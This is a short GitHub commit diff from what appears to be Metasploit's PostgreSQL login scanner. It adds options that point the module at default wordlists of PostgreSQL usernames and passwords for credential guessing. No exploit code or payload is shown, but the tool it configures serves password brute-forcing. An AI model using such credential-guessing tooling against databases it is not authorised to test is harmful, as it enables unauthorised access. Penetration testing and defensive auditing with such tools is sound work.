- OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
+ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
+ OptPath.new('USER_FILE', [ false, "File containing users, one per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
+ OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
], self.class)
deregister_options('SQL')
Oops, something went wrong.

0 comments on commit 62c8c6e

Please sign in to comment.